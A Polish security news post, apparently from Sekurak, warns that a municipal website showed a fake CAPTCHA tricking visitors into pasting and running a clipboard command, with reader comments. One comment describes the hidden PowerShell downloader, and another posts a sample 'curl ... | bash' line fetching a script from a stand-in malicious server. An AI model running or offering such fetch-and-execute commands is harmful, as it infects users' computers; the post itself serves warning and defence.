Konferencja Mega Sekurak Hacking Party w Krakowie – 26-27 października!

Adminie… Czy znamy Twoje grzechy? ;-) Sprawdź!

Wchodzisz na stronę gminy – a tu złośliwa CAPTCHA, która infekuje Twój komputer

09 marca 2026, 17:13 | W biegu | komentarzy 10

Tym razem chodzi o stronę gminy Długołęka. Nasz czytelnik poinformował nas o takim incydencie: wchodzisz na stronę gmina[.]dlugoleka[.]pl i od razu pojawia się prośba o potwierdzenie, że jesteś człowiekiem:

No dobra, nie ma tu nic podejrzanego, klikamy dalej a tu coś takiego:

W momencie kliknięcia checkboxu na poprzednim zdjęciu, zainfekowana strona umieściła w schowku systemowym Windows złośliwe polecenie, a teraz chce nas skłonić do tego żebyśmy je uruchomili!

  • Windows+R (otwiera windowsowe okno dialogowe “uruchom”)
  • Ctrl+V (wkleja polecenie ze schowka)
  • Enter (wykonuje wklejone polecenie)

W ten sposób niczego nieświadome ofiary infekują swój komputer. Sam Cloudflare nie uczestniczy w całym procederze – jego logo po prostu zostało umieszczone przez atakujących na grafice wyżej – tak żeby uwiarygodnić całą akcję.

Jak w ogóle do tego doszło? Możliwości jest kilka:

  • Przełamanie zabezpieczeń strony gminy (czyli tzw. zhackowanie strony, poprzez wykorzystanie podatności – najczęściej aplikacyjnych)
  • Proste hasło administracyjne do systemu
  • Wyciek hasła administracyjnego / przejęcie komputera administratora strony

W każdym razie o problemie powiadomiliśmy CERT Polska, który skontaktował się z Gminą.

~ms

Spodobał Ci się wpis? Podziel się nim ze znajomymi:



Komentarze

  1. Pierwszy !!!

    😃👍

    Odpowiedz
  2. Mariusz

    szkoda, że nie opublikowaliście w trybie graficznym (jako zrzut ekranu) tego złośliwego polecenia

    Odpowiedz
    • Szymon

      powershell -Command “Update-Brain -Source Sekurak -Daily”

      Odpowiedz
    • Paweł

      Czemu jako grafika? Czysty tekst.

      Odpowiedz
    • Wojciech

      Dokladnie. Dajcie w komentarzu ten cod ze schowka. Przetestowalbym co robi.

      Odpowiedz
      • Michał

        Maskuje adres www w PSie rozbijając go na 3 albo 4 zmienne. Polecenie składa adres w całość poprzez zdefiniowane zmienne do pobrania do f=$env:temp pliku Setup-Full.msi a następnie go odpala z poleceniem -cisza -nieresetuj.
        Stajesz się zombie i w najlepszym przypadku kopiesz jakieś coiny.
        W najgorszym wrzucają ci node C&C i tylko od operatora zależy co się stanie ;)

        Odpowiedz
        • Bartek

          A co antywirusami?
          I czy nie trzeba miec admina zeby zainstalowac jakies potezne gowno?
          pytam teoeretycznie :)

          Odpowiedz
  3. Przemo

    Proszę bardzo: curl -s http://zly-serwer.pl/sh | bash #
    Możesz sobie na serwerze wymyśleć jakikolwiek skrypt bashowy, który robi cokolwiek.

    Odpowiedz
  4. play stupid games win stupid prizes

    Piękne. Nic tylko czekać aż, wraz z rozpowszechnieniem “weryfikacji wieku” (dla twojego dobra!), takie captche zaczną pytać o zdjęcia dowodu :)

    Odpowiedz
  5. Marek

    Coraz więcej stron jest tak zainfekowanych
    teraz mam ten sam przypadek na infospi[.]pl

    Odpowiedz

Odpowiedz